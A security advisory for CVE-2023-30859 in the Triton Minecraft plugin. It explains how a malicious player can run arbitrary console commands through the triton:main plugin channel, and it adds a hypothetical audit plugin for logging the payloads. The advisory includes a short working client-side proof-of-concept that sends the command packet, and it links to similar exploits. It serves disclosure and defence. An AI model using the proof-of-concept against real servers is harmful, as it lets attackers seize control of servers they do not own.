Headline
CVE-2023-30859: Arbitrary command execution on Spigot console by malicious player
Triton is a Minecraft plugin for Spigot and BungeeCord that helps you translate your Minecraft server. The CustomPayload packet allows you to execute commands on the Spigot/Bukkit console. When you enable bungee mode in the config, it will enable the bungee bridge and the server will begin to broadcast the ‘triton:main’ plugin channel. Using this plugin channel, you are able to send a payload packet containing a byte (2) and a string (any Spigot command). This could be used to make yourself a server operator and to extract other users' information through phishing (pretending to be an admin); many servers use Essentials, so the /geoip command could be available to them, etc. This could also be modified to allow you to set the server's language, set another player's language, etc. This issue affects those who have bungee enabled in the config. This issue has been fixed in version 3.8.4.
Summary
A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.
Details
When you enable BungeeCord mode in the config, the plugin will enable the proxy bridge, and the server will begin to broadcast the triton:main plugin channel.
This channel is used by Triton for communication between the proxy and the server (and vice-versa), and allows, among other actions, telling the server to execute any command as the console.
Triton did not filter incoming plugin messaging packets from players, so a modded client could send a packet that would allow them to execute any command they wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for privilege escalation in the Minecraft server, and perhaps even an RCE on the machine itself.
Using this plugin channel, the malicious player is able to send a payload packet containing a byte (2) and a string (any Spigot command).
Other payloads could also be sent, which could mess with the server’s translations, for instance, but those are less powerful than the above payload.
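As an added example, which is not Triton's code and not part of the original advisory, the following hypothetical Bukkit audit plugin registers for the triton:main channel and logs every sub-channel 2 message together with the player connection that delivered it, so that administrators of not-yet-updated servers can see the payload described above in their logs. It assumes Guava is available (it ships with Spigot) and a plugin.yml naming TritonChannelAudit as the main class.

```java
import com.google.common.io.ByteArrayDataInput;
import com.google.common.io.ByteStreams;
import org.bukkit.entity.Player;
import org.bukkit.plugin.java.JavaPlugin;
import org.bukkit.plugin.messaging.PluginMessageListener;

// Hypothetical audit plugin, not Triton's own code. It listens on the same
// plugin channel Triton uses and records who delivered a sub-channel 2
// ("run console command") message and what the command text was.
public final class TritonChannelAudit extends JavaPlugin implements PluginMessageListener {
    private static final String CHANNEL = "triton:main";
    private static final byte SUBCHANNEL_CONSOLE_COMMAND = 2; // value from the advisory

    @Override
    public void onEnable() {
        // Bukkit delivers every message on this channel that arrives over a player
        // connection, whether the proxy or a modded client produced it.
        getServer().getMessenger().registerIncomingPluginChannel(this, CHANNEL, this);
    }

    @Override
    public void onPluginMessageReceived(String channel, Player player, byte[] message) {
        if (!CHANNEL.equals(channel) || message.length == 0) {
            return;
        }
        ByteArrayDataInput in = ByteStreams.newDataInput(message);
        byte subChannel = in.readByte();
        if (subChannel != SUBCHANNEL_CONSOLE_COMMAND) {
            getLogger().fine("triton:main sub-channel " + subChannel + " from " + player.getName());
            return;
        }
        String command;
        try {
            // Same framing the PoC writes with DataOutputStream.writeUTF
            // (2-byte big-endian length followed by modified UTF-8).
            command = in.readUTF();
        } catch (IllegalStateException e) { // Guava wraps EOF and encoding errors in this
            command = "<malformed payload, " + message.length + " bytes>";
        }
        getLogger().warning("triton:main console-command payload delivered over connection of "
                + player.getName() + " (" + player.getAddress() + "): " + command);
    }
}
```

Because BungeeCord forwards its own messages through the same player connection, a logged sub-channel 2 message is not proof of abuse by itself; the record is there to correlate with that player's activity, and updating Triton to 3.8.4 remains the fix.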
Proof of Concept
Demonstration video:
POC Video
Demonstration code:
// This is for version 1.8, for later versions the code will change slightly
private void triton(String command) {
    try {
        ByteArrayOutputStream b = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(b);
        out.writeByte(2); // Sub Channel ID
        out.writeUTF(command); // Command
        PacketBuffer buffer = new PacketBuffer(Unpooled.buffer());
        buffer.writeBytes(b.toByteArray());
        mc.thePlayer.sendQueue.addToSendQueue(new C17PacketCustomPayload("triton:main", buffer));
    } catch (Exception e) {
        e.printStackTrace();
    }
}
This is similar to these exploits:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit
Impact
This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have bungeecord set to true in Triton’s config.yml, whether or not they are actually behind BungeeCord or Velocity.